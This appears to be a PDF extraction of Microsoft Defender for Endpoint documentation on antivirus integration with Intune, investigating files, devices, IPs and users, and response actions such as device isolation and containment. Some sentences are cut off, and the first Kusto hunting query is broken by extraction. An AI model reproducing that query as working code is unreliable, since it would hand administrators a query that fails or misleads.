 Tip
Feedback

Antivirus and Intune integration
Article • 02/09/2024
Applies to:

Platforms
Windows
macOS
Android
In the Microsoft Defender portal, you can view and manage threat detections using the
following steps:
1. Visit Microsoft XDR portal and sign-in.
On the landing page, you'll see the Devices with active malware card with the
following information:
Display text: Applies to Intune-managed devices. Devices with multiple

malware detections may be counted more than once.
Last updated date and time.
A bar with the Active and Malware remediated portions as per your scan.
You can select View Details for more information.
2. Once remediated, you'll see the following text being displayed:
Malware found on your devices have been remediated successfully.
Manage threat detections in Microsoft Intune

You can manage threat detections for any devices that are enrolled in Microsoft Intune
using the following steps:
1. Go to the Microsoft Intune admin center at intune.microsoft.com and sign-in.
2. In the navigation pane, select Endpoint security.
3. Under Manage, select Antivirus. You'll see tabs for Summary, Unhealthy
endpoints, and Active malware.
4. Review the information on the available tabs, and then take action as necessary.
For example, when you can select a device that is listed under the Active malware
tab, you can choose one action from the list of actions provided:
Restart
Quick Scan
Full Scan
Sync
Update signatures
FAQs
In the Microsoft XDR portal > Devices with active

malware > Devices with malware detections report, why
does the Last update seem to be occurring today?
To see when the malware was detected, you can do the following:
1. Since this is an integration with Intune, visit Intune portal and select Antivirus
and then select Active malware tab.
2. Select Export.
3. On your device, go to Downloads, and extract the Active
malware_YYYY_MM_DD_THH_MM_SS.0123Z.csv.zip.
4. Open the CSV and find the LastStateChangeDateTime column to see when
malware was detected.
In the devices with malware detections report, why can’t I

see any information about which malware was detected
on the device.
To see the malware name, visit the Intune portal as this is an integration with Intune,
select Antivirus, and select Active malware tab and you'll see a column named Malware
name.
I see a different number for active malware in Devices
with active malware report, when compared to numbers I
see using Reports > Detected malware, and Intune >
Antivirus > Active malware.
The Devices with active malware report is based on the devices that were active within
the last 1 day (24 hours) and had malware detections within the last 15 days.
Use the following Advanced Hunting query:
Kusto
DeviceInfo
| where Timestamp > startofday(datetime(2024-01-29 00:00:00))
| where OnboardingStatus == "Onboarded"
| where SensorHealthState == "Active"
| distinct DeviceId, DeviceName
| join kind=innerunique (
AlertEvidence
| where ServiceSource == "Microsoft Defender for Endpoint"
| where DetectionSource == "Antivirus"
DeviceName
| distinct DeviceName, DeviceId, Title, AlertId, Timestamp
I searched the computer name in the top search bar and

got two devices with the same name. I don't know which
one of those two devices the report is referring to?
Use the Advanced Hunting query that is mentioned here for details such as unique
DeviceID, Title, AlertID, and the remediation process. After identifying, work with your IT
admin’s to make sure that the devices are uniquely named. If a device is retired, use tags
to decommission it.
I see malware detection in Intune and on the Devices with

active malware report, but I don’t see it in the MDE Alerts
queue or in the Incidents queue.
It might be that the URL's Cloud Protection is currently not being allowed through your
firewall or proxy.
You need to ensure that when you run %ProgramFiles%\Windows Defender\MpCmdRun.exe -
ValidateMapsConnection on your device, the reporting is Ok.
Related articles
Alerts in Microsoft Defender for Endpoint
Alerts queue in Microsoft Defender XDR
Feedback

Investigate a file
Article • 07/18/2023
Applies to:

Investigate the details of a file associated with a specific alert, behavior, or event to help
determine if the file exhibits malicious activities, identify the attack motivation, and
understand the potential scope of the breach.
There are many ways to access the detailed profile page of a specific file. For example,
you can use the search feature, click on a link from the Alert process tree, Incident
graph, Artifact timeline, or select an event listed in the Device timeline.
Once on the detailed profile page, you can switch between the new and old page
layouts by toggling new File page. The rest of this article describes the newer page
layout.
You can get information from the following sections in the file view:
File details and PE metadata (if it exists)

Incidents and alerts
Observed in organization
File names
File content and capabilities (if a file has been analyzed by Microsoft)
You can also take action on a file from this page.
File actions
The file actions are above the file information cards at the top of the profile page.
Actions you can perform here include:
Stop and quarantine

Manage indicator
Download file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis
See take response action on a file for more information on these actions.
File page overview

The file page offers an overview of the file's details and attributes, the incidents and
alerts where the file is seen, file names used, the number of devices where the file was
seen in the last 30 days, including the dates when the file was first and last seen in the
organization, Virus Total detection ratio, Microsoft Defender Antivirus detection, the
number of cloud apps connected to the file, and the file's prevalence in devices outside
of the organization.
７ Note
Different users may see dissimilar values in the devices in organization section of
the file prevalence card. This is because the card displays information based on the
role-based access control (RBAC) scope that a user has. This means if a user has
been granted visibility on a specific set of devices, they will only see the file
organizational prevalence on those devices.

The Incidents and alerts tab provides a list of incidents that are associated with the file
and the alerts the file is linked to. This list covers much of the same information as the
incidents queue. You can choose what kind of information is shown by selecting
Customize columns. You can also filter the list by selecting Filter.
The Observed in organization tab shows you the devices and cloud apps observed with
the file. File history related to devices can be shown up to the last six months, whereas
cloud apps-related history is up to the last 30 days
Devices
This section shows all the devices where the file is detected. The section includes a
trending report identifying the number of devices where the file has been observed in
the past 30 days. Below the trendline, you can find detailed information on the file on
each device where it is seen, including file execution status, first and last seen events on
each device, initiating process and time, and file names associated with a device.
You can click on a device on the list to explore the full six months file history on each
device and pivot to the first seen event in the device timeline.

Cloud apps
７ Note
The Defender for Cloud Apps workload must be enabled to see file information
related to cloud apps.
This section shows all the cloud applications where the file is observed. It also includes
information like the file's names, the users associated with the app, the number of
matches to a specific cloud app policy, associated apps' names, when the file was last
modified, and the file's path.
File names
The File names tab lists all names the file has been observed to use, within your
organizations.
File content and capabilities
７ Note
The file content and capabilities views depend on whether Microsoft analyzed the
file.
The File content tab lists information about portable executable (PE) files, including
process writes, process creation, network activities, file writes, file deletes, registry reads,
registry writes, strings, imports, and exports. This tab also lists all the file's capabilities.
The file capabilities view lists a file's activities as mapped to the MITRE ATT&CK™
techniques.

Related topics
View and organize the Microsoft Defender for Endpoint queue
Take response actions on a file
 Tip
Feedback

Investigate devices in the Microsoft
Defender for Endpoint Devices list
Article • 02/21/2024
Applies to:

Investigate the details of an alert raised on a specific device to identify other behaviors
or events that might be related to the alert or the potential scope of the breach.
７ Note

package from a device. Here's how: Collect investigation package from devices.
You can select on affected devices whenever you see them in the portal to open a
detailed report about that device. Affected devices are identified in the following areas:
Devices list
Alerts queue
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific device, you see:
Device details
Response actions
Tabs (overview, alerts, timeline, security recommendations, software inventory,
discovered vulnerabilities, missing KBs)
Cards (active alerts, logged on users, security assessment, device health status)

７ Note
Due to product constrains, the device profile does not consider all cyber evidence
when determining the 'Last Seen' timeframe (as seen on the device page as well).
For example, the 'Last seen' value in the Device page may show an older time frame
even though more recent alerts or data is available in the machine's timeline.
Device details
The device details section provides information such as the domain, OS, and health state
of the device. If there's an investigation package available on the device, you see a link
that allows you to download the package.
Response actions
Response actions run along the top of a specific device page and include:
Manage tags
Isolate device
Restrict app execution
Run antivirus scan
Collect investigation package
Initiate Live Response Session
Initiate automated investigation
Consult a threat expert
Action center
You can take response actions in the Action center, in a specific device page, or in a
specific file page.
For more information on how to take action on a device, see Take response action on a
device.
For more information, see Investigate user entities.
Tabs
The tabs provide relevant security and threat prevention information related to the
device. In each tab, you can customize the columns that are shown by selecting
Customize columns from the bar above the column headers.
Overview
The Overview tab displays the cards for active alerts, logged on users, and security
assessment.

The Incidents and alerts tab provides a list of incidents and alerts that are associated
with the device. This list is a filtered version of the Alerts queue, and shows a short
description of the incident, alert, severity (high, medium, low, informational), status in
the queue (new, in progress, resolved), classification (not set, false alert, true alert),
investigation state, category of alert, who is addressing the alert, and last activity. You
can also filter the alerts.

When an alert is selected, a fly-out appears. From this panel you can manage the alert
and view more details such as incident number and related devices. Multiple alerts can
be selected at a time.
To see a full page view of an alert, select the title of the alert.
Timeline
The Timeline tab provides a chronological view of the events and associated alerts that
have been observed on the device. This can help you correlate any events, files, and IP
addresses in relation to the device.
The timeline also enables you to selectively drill down into events that occurred within a
given time period. You can view the temporal sequence of events that occurred on a
device over a selected time period. To further control your view, you can filter by event
groups or customize the columns.
７ Note
For firewall events to be displayed, you'll need to enable the audit policy, see Audit
Filtering Platform connection.
Firewall covers the following events:
5025 - firewall service stopped

5031 - application blocked from accepting incoming connections on the
network
5157 - blocked connection

Some of the functionality includes:
Search for specific events

Use the search bar to look for specific timeline events.
Filter events from a specific date
Select the calendar icon in the upper left of the table to display events in the
past day, week, 30 days, or custom range. By default, the device timeline is set
to display the events from the past 30 days.
Use the timeline to jump to a specific moment in time by highlighting the
section. The arrows on the timeline pinpoint automated investigations
Export detailed device timeline events
Export the device timeline for the current date or a specified date range up to
seven days.
More details about certain events are provided in the Additional information section.
These details vary depending on the type of event, for example:
Contained by Application Guard - the web browser event was restricted by an

isolated container
Active threat detected - the threat detection occurred while the threat was running
Remediation unsuccessful - an attempt to remediate the detected threat was
invoked but failed
Remediation successful - the detected threat was stopped and cleaned
Warning bypassed by user - the Windows Defender SmartScreen warning was
dismissed and overridden by a user
Suspicious script detected - a potentially malicious script was found running
The alert category - if the event led to the generation of an alert, the alert category
(Lateral Movement, for example) is provided
Event details
Select an event to view relevant details about that event. A panel displays to show
general event information. When applicable and data is available, a graph showing
related entities and their relationships are also shown.
To further inspect the event and related events, you can quickly run an advanced
hunting query by selecting Hunt for related events. The query returns the selected
event and the list of other events that occurred around the same time on the same
endpoint.
Security recommendations are generated from Microsoft Defender for Endpoint's
Vulnerability Management capability. Selecting a recommendation shows a panel where
you can view relevant details such as description of the recommendation and the
potential risks associated with not enacting it. See Security recommendation for details.
Security policies
The Security policies tab shows the endpoint security policies that are applied on the
device. You see a list of policies, type, status, and last check-in time. Selecting the name
of a policy takes you to the policy details page where you can see the policy settings
status, applied devices, and assigned groups.

Software inventory
The Software inventory tab lets you view software on the device, along with any
weaknesses or threats. Selecting the name of the software takes you to the software
details page where you can view security recommendations, discovered vulnerabilities,
installed devices, and version distribution. See Software inventory for details.
Discovered vulnerabilities
The Discovered vulnerabilities tab shows the name, severity, and threat insights of
discovered vulnerabilities on the device. If you select a specific vulnerability, you see a
description and details.

Missing KBs
The Missing KBs tab lists the missing security updates for the device.
Cards
Active alerts
The Azure Advanced Threat Protection card displays a high-level overview of alerts
related to the device and their risk level, if you're using the Microsoft Defender for
Identity feature, and there are any active alerts. More information is available in the
Alerts drill down.

７ Note
You'll need to enable the integration on both Microsoft Defender for Identity and
Defender for Endpoint to use this feature. In Defender for Endpoint, you can enable
this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.
Logged on users
The Logged on users card shows how many users have logged on in the past 30 days,
along with the most and least frequent users. Selecting the See all users link opens the
details pane, which displays information such as user type, sign-in type, and when the
user was first and last seen. For more information, see Investigate user entities.
７ Note
The 'Most frequent' user value is calculated only based on evidence of users who
successfully logged on interactively. However, the All users side-pane calculates all
sorts of user logons so it is expected to see more frequent users in the side-pane,
given that those users may not be interactive.
Security assessments
The Security assessments card shows the overall exposure level, security
recommendations, installed software, and discovered vulnerabilities. A device's exposure
level is determined by the cumulative impact of its pending security recommendations.
Device health status

The Device health status card shows a summarized health report for the specific device.
One of the following messages is displayed at the top of the card to indicate the overall
status of the device (listed in order of highest to lowest priority):
Defender Antivirus not active

Security intelligence isn't up to date
Engine isn't up to date
Quick scan failed
Full scan failed
Platform isn't up to date
Security intelligence update status is unknown
Engine update status is unknown
Quick scan status is unknown
Full scan status is unknown
Platform update status is unknown
Device is up to date
Status not available for macOS & Linux
Other information in the card includes: the last full scan, last quick scan, security
intelligence update version, engine update version, platform update version, and
Defender Antivirus mode.
Note that a grey circle indicates that the data is unknown.

７ Note
The overall status message for macOS and Linux devices currently shows up as
'Status not available for macOS & Linux'. Currently, the status summary is only
available for Windows devices. All other information in the table is up to date to
show the individual states of each device health signal for all supported platforms.
To gain an in-depth view of the device health report, you can go to Reports > Devices
health. For more information, see Device health and compliance report in Microsoft
７ Note
The date and time for Defender Antivirus mode is currently not available.
Related articles
Investigate a user account in Defender for Endpoint
Security recommendation
Software inventory
 Tip
Feedback

Investigate an IP address associated
with a Microsoft Defender for Endpoint
alert
Article • 11/17/2022
Applies to:

Examine possible communication between your devices and external internet protocol
(IP) addresses.
Identifying all devices in the organization that communicated with a suspected or

known malicious IP address, such as Command and Control (C2) servers, helps
determine the potential scope of breach, associated files, and infected devices.
You can find information from the following sections in the IP address view:
IP geo information
Alerts related to this IP
IP in organization observations
Prevalence in organization
IP geo information
In the left pane, the page provides IP details (if available).
Organization (ISP)
ASN
Country
State
City
Carrier
Latitude
Longitude
Postal code
Alerts related to this IP
The Alerts related to this IP section provides a list of alerts that are associated with the
IP.
IP observed in organization
The IP observed in organization section provides a list of devices that have a
connection with this IP and the last event details for each device (the list is limited to
100 devices).
Prevalence
The Prevalence section displays how many devices have connected to this IP address,
and when the IP was first and last seen. You can filter the results of this section by time
period; the default period is 30 days.
Investigate an external IP:
1. Enter the IP address in the Search field.

2. Select the IP suggestion box and open the IP side panel.
3. Select Enter.
Details about the IP address are displayed, including: registration details (if available),
prevalence of devices in the organization that communicated with this IP Address
(during selectable time period), and the devices in the organization that were observed
communicating with this IP address.
７ Note
Search results will only be returned for IP addresses observed in communication

with devices in the organization.
Use the search filters to define the search criteria. You can also use the timeline search
box to filter the displayed results of all devices in the organization observed
communicating with the IP address, the file associated with the communication and the
last date observed.
Clicking any of the device names will take you to that device's view, where you can
continue to investigate reported alerts, behaviors, and events.
Related topics
 Tip
Feedback

Investigate connection events that occur
behind forward proxies
Article • 11/15/2023
Applies to:

Defender for Endpoint supports network connection monitoring from different levels of
the network stack. A challenging case is when the network uses a forward proxy as a
gateway to the Internet.
The proxy acts as if it was the target endpoint. In these cases, simple network
connection monitors audit the connections with the proxy that is correct but has lower
investigation value.
Defender for Endpoint supports advanced HTTP level monitoring through network
protection. When turned on, a new type of event is surfaced which exposes the real
target domain names.
Use network protection to monitor network

connection behind a firewall
Monitoring network connection behind a forward proxy is possible due to other
network events that originate from network protection. To see them on a device
timeline, turn on network protection (at the minimum in audit mode).
Network protection can be controlled using the following modes:
Block: Users or apps are blocked from connecting to dangerous domains. You'll be
able to see this activity in Microsoft Defender XDR.
Audit: Users or apps won't be blocked from connecting to dangerous domains.
However, you'll still see this activity in Microsoft Defender XDR.
If you turn off network protection, users or apps won't be blocked from connecting to
dangerous domains. You won't see any network activity in Microsoft Defender XDR.
If you don't configure it, network blocking is turned off by default.
For more information, see Enable network protection.
Investigation impact
When network protection is turned on, you'll see that on a device's timeline the IP
address keeps representing the proxy, while the real target address shows up.
Other events triggered by the network protection layer are now available to surface the
real domain names even behind a proxy.
Event's information:

Hunt for connection events using advanced

hunting
All new connection events are available for you to hunt on through advanced hunting as
well. Since these events are connection events, you can find them under the
DeviceNetworkEvents table under the ConnecionSuccess action type.
Using this simple query shows you all the relevant events:
Console
DeviceNetworkEvents
| where ActionType == "ConnectionSuccess"
| take 10
You can also filter out events that are related to connection to the proxy itself.
Use the following query to filter out the connections to the proxy:
Console
DeviceNetworkEvents
| where ActionType == "ConnectionSuccess" and RemoteIP != "ProxyIP"
| take 10
Related articles
Applying network protection with GP - policy CSP
 Tip
Feedback

Investigate a user account in Microsoft
Article • 03/29/2023
Applies to:

Investigate user account entities

Identify user accounts with the most active alerts (displayed on dashboard as "Users at
risk") and investigate cases of potential compromised credentials, or pivot on the
associated user account when investigating an alert or device to identify possible lateral
movement between devices with that user account.
You can find user account information in the following views:
Dashboard
Alert queue
Device details page
A clickable user account link is available in these views, which take you to the user
account details page where more details about the user account are shown.
When you investigate a user account entity, you can see:
User account details, Microsoft Defender for Identity alerts, and logged on devices,
role, logon type, and other details
Overview of the incidents and user's devices
Alerts related to this user
Observed in organization (devices logged on to)

User details
The User details pane on left provides information about the user, such as related open
incidents, active alerts, SAM name, SID, Microsoft Defender for Identity alerts, number of
devices the user is logged on to, when the user was first and last seen, role, and logon
types. Depending on the integration features you've enabled, you can see other details.
For example, if you enable the Skype for business integration, you're able to contact the
user from the portal. The Azure ATP alerts section contains a link that takes you to the
Microsoft Defender for Identity page, if you've enabled the Microsoft Defender for
Identity feature, and there are alerts related to the user. The Microsoft Defender for
Identity page provides more information about the alerts.
７ Note
You'll need to enable the integration on both Microsoft Defender for Identity and
Defender for Endpoint to use this feature. In Defender for Endpoint, you can enable
this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.
The Overview, Alerts, and Observed in organization are different tabs that display
various attributes about the user account.
７ Note
For Linux devices, information about logged in users is not displayed.
Overview
The Overview tab shows the incidents details and a list of the devices that the user has
logged on to. You can expand these to see details of the log-on events for each device.
Alerts
The Alerts tab provides a list of alerts that are associated with the user account. This list
is a filtered view of the Alert queue, and shows alerts where the user context is the
selected user account, the date when the last activity was detected, a short description
of the alert, the device associated with the alert, the alert's severity, the alert's status in
the queue, and who is assigned the alert.
The Observed in organization tab allows you to specify a date range to see a list of
devices where this user was observed logged on to, the most frequent and least
frequent logged on user account for each of these devices, and total observed users on
each device.
Selecting an item on the Observed in organization table expands the item, revealing
more details about the device. Directly selecting a link within an item sends you to the
corresponding page.
Search for specific user accounts

1. Select User from the Search bar drop-down menu.
2. Enter the user account in the Search field.
3. Click the search icon or press Enter.
A list of users matching the query text is displayed. You can see the user account's
domain and name, when the user account was last seen, and the total number of
devices it was observed logged on to in the last 30 days.
You can filter the results by the following time periods:
1 day
3 days
7 days
30 days
6 months
Related articles
Investigate devices in the Defender for Endpoint Devices list
 Tip
Feedback

Take response actions on a device
Article • 12/15/2023
Applies to:

） Important

Quickly respond to detected attacks by isolating devices or collecting an investigation

package. After taking action on devices, you can check activity details on the Action
center.
Manage tags
Initiate Automated Investigation
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Defender for Endpoint Plan 1 includes only the following manual response actions:
Run antivirus scan

Isolate device
Add an indicator to block or allow a file.
Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.
Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.
You can find device pages from any of the following views:
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.
） Important
For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.
Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
enable dynamic list creation as part of an incident.
For more information on device tagging, see Create and manage device tags.

You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.
For more information on automated investigations, see Overview of Automated

investigations.
Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.
Live response is designed to enhance investigations by enabling you to collect forensic

data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.
For more information on live response, see Investigate entities on devices using live
response.
Collect investigation package from devices

package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.
To download the package (Zip file) and investigate the events that occurred on a device:
1. Select Collect investigation package from the row of response actions at the top
of the device page.
2. Specify in the text box why you want to perform this action. Select Confirm.
3. The zip file downloads.
Alternate steps:
1. Select Collect Investigation Package from the response actions section of the
device page.
2. Add comments and select Confirm.

3. Select Action center from the response actions section of the device page.
4. Click the Package collection package available to download the collection

package.
For Windows devices, the package contains the following folders:
ﾉ Expand table
Folder Description
Autoruns Contains a set of files that each represent the content of

the registry of a known auto start entry point (ASEP) to
help identify attacker's persistency on the device.
NOTE: If the registry key is not found, the file

will contain the following message: "ERROR:
The system was unable to find the specified
registry key or value."
Installed programs This .CSV file contains the list of installed programs that
can help identify what is currently installed on the device.
For more information, see Win32_Product class .
Network connections This folder contains a set of data points related to the
connectivity information that can help in identifying
connectivity to suspicious URLs, attacker's command and
control (C&C) infrastructure, any lateral movement, or
remote connections.
ActiveNetConnections.txt: Displays protocol
statistics and current TCP/IP network connections.
Provides the ability to look for suspicious
connectivity made by a process.
Arp.txt: Displays the current address resolution
protocol (ARP) cache tables for all interfaces. ARP
cache can reveal other hosts on a network that have
been compromised or suspicious systems on the
network that might have been used to run an
internal attack.
DnsCache.txt: Displays the contents of the DNS
client resolver cache, which includes both entries
preloaded from the local Hosts file and any recently
obtained resource records for name queries
resolved by the computer. This can help in
identifying suspicious connections.
IpConfig.txt: Displays the full TCP/IP configuration
for all adapters. Adapters can represent physical
interfaces, such as installed network adapters, or
logical interfaces, such as dial-up connections.
FirewallExecutionLog.txt and pfirewall.log
NOTE: The pfirewall.log file must exist in

%windir%\system32\logfiles\firewall\pfirewall.
log, so it will be included in the investigation
package. For more information on creating
Folder Description
the firewall log file, see Configure the

Windows Defender Firewall with Advanced
Security Log
Prefetch files Windows Prefetch files are designed to speed up the

application startup process. It can be used to track all the
files recently used in the system and find traces for
applications that might have been deleted but can still be
found in the prefetch file list.
Prefetch folder: Contains a copy of the prefetch files
from %SystemRoot%\Prefetch . NOTE: It is suggested
to download a prefetch file viewer to view the
prefetch files.
PrefetchFilesList.txt: Contains the list of all the
copied files that can be used to track if there were
any copy failures to the prefetch folder.
Processes Contains a .CSV file listing the running processes and

provides the ability to identify current processes running
on the device. This can be useful when identifying a
suspicious process and its state.
Scheduled tasks Contains a .CSV file listing the scheduled tasks, which can
be used to identify routines performed automatically on a
chosen device to look for suspicious code that was set to
run automatically.
Security event log Contains the security event log, which contains records of
login or logout activity, or other security-related events
specified by the system's audit policy.
NOTE: Open the event log file using Event

viewer.
Services Contains a .CSV file that lists services and their states.
Windows Server Message Lists shared access to files, printers, and serial ports and
Block (SMB) sessions miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral
movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.
Folder Description
NOTE: If there are no sessions (inbound or

outbound), you'll get a text file that tells you
that there are no SMB sessions found.
System Information Contains a SystemInformation.txt file that lists system

information such as OS version and network cards.
Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.
NOTE: If the file contains the following

message: "The system cannot find the path
specified", it means that there is no temp
directory for this user, and might be because
the user didn't log in to the system.
Users and Groups Provides a list of files that each represent a group and its
members.
WdSupportLogs Provides the MpCmdRunLog.txt and MPSupportFiles.cab
NOTE: This folder will only be created on

Windows 10, version 1709 or later with
February 2020 update rollup or more recent
installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996
CollectionSummaryReport.xls This file is a summary of the investigation package

collection, it contains the list of data points, the command
used to extract the data, the execution status, and the
Folder Description
error code if there is failure. You can use this report to

track if the package includes all the expected data and
identify if there were any errors.
The collection packages for macOS and Linux devices contain the following:
ﾉ Expand table
Object macOS Linux
Applications A list of all installed applications Not applicable
Disk volume Amount of free space Amount of free space

List of all mounted disk List of all mounted disk
volumes volumes
List of all partitions List of all partitions
File A list of all open files with the A list of all open files with the
corresponding processes using corresponding processes using
these files these files
History Shell history Not applicable
Kernel modules All loaded modules Not applicable
Network Active connections Active connections

connections Active listening connections Active listening connections
ARP table ARP table
Firewall rules Firewall rules
Interface configuration IP list
Proxy settings Proxy settings
VPN settings
Processes A list of all running processes A list of all running processes
Services and Certificates CPU details

scheduled tasks Configuration profiles Hardware information
Hardware information Operating system
information
System security Extensible Firmware Interface Not applicable

information (EFI) integrity information
Firewall status
Malware Removal Tool (MRT)
information
Object macOS Linux
System Integrity Protection

(SIP) status
Users and Login history Login history

groups Sudoers Sudoers
Run Microsoft Defender Antivirus scan on

devices
As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.
） Important
This action is supported for macOS and Linux for client version 101.98.84 and
above. You can also use live response to run the action. For more information
on live response, see Investigate entities on devices using live response
A Microsoft Defender Antivirus scan can run alongside other antivirus
solutions, whether Microsoft Defender Antivirus is the active antivirus solution
or not. Microsoft Defender Antivirus can be in Passive mode. For more
One you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.
７ Note
When triggering a scan using Defender for Endpoint response action, Microsoft
Defender antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.
） Important
This action is available for devices on Windows 10, version 1709 or later,
Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code
integrity policy formats and signing requirements. For more information, see
Code integrity policy formats and signing).
To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.
７ Note
You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.
Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.
Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:
７ Note
The notification is not available on Windows Server 2016 and Windows Server 2012
R2.
Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.
） Important
101.98.84 and above. You can also use live response to run the action. For
more information on live response, see Investigate entities on devices using
live response
Full isolation is available for devices running Windows 11, Windows 10,
version 1703 or later, Windows Server 2022, Windows Server 2019, Windows
Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft
Defender for Endpoint on Linux listed in System requirements. Ensure that
the following prerequisites are enabled: iptables, ip6tables, and Linux kernel
with CONFIG_NETFILTER, CONFID_IP_NF_IPTABLES, and
CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709
or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed.
Therefore, devices that are behind a full VPN tunnel won't be able to reach
the Microsoft Defender for Endpoint cloud service after the device is isolated.
We recommend using a split-tunneling VPN for Microsoft Defender for
Endpoint and Microsoft Defender Antivirus cloud-based protection-related
traffic.
The feature supports VPN connection.
You must have at least one the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For
more information, see Create and manage device groups.
Exclusion for both macOS and Linux isolation is not supported.
An isolated device is removed from isolation when an administrator modifies
or adds a new iptable rule to the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all
child virtual machines of the server.
This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.
On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a 'Selective Isolation').
７ Note
You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.
Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

７ Note
The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.
Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive.
There's a downloadable script for these instances that you can run to forcibly release
devices from isolation. The script is available through a link in the UI.
７ Note
Admins and manage security settings in Security Center permissions can

forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.
To forcibly release device from isolation:
1. On the device page, select Download script to force-release a device from

isolation from the action menu.
2. On the right-hand side wizard, select Download script.
Minimum requirements
The minimum requirements for 'forcibly release device from isolation' feature are:
Supports only Windows

The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB KB5023773
Windows 11 version 21H2, all editions with KB5023774

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:
７ Note
The notification is not available on non-Windows platforms.
Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.
７ Note
Blocking incoming and outgoing communication with a 'contained' device is

supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.
How to contain a device

1. Go to the Device inventory page and select the device to contain.
2. Select Contain device from the actions menu in the device flyout.
3. On the contain device popup, type a comment, and select Confirm.


Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar:
７ Note
It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.
） Important
If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (It may take up to 5 mins to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.
After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.
Stop containing a device

You'll be able to stop containing a device at any time.
1. Select the device from the Device inventory or open the device page.
2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.
Contain user from the network

When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access, and helping prevent attacks-- specifically,
ransomware. When an identity is contained, any supported Microsoft Defender for
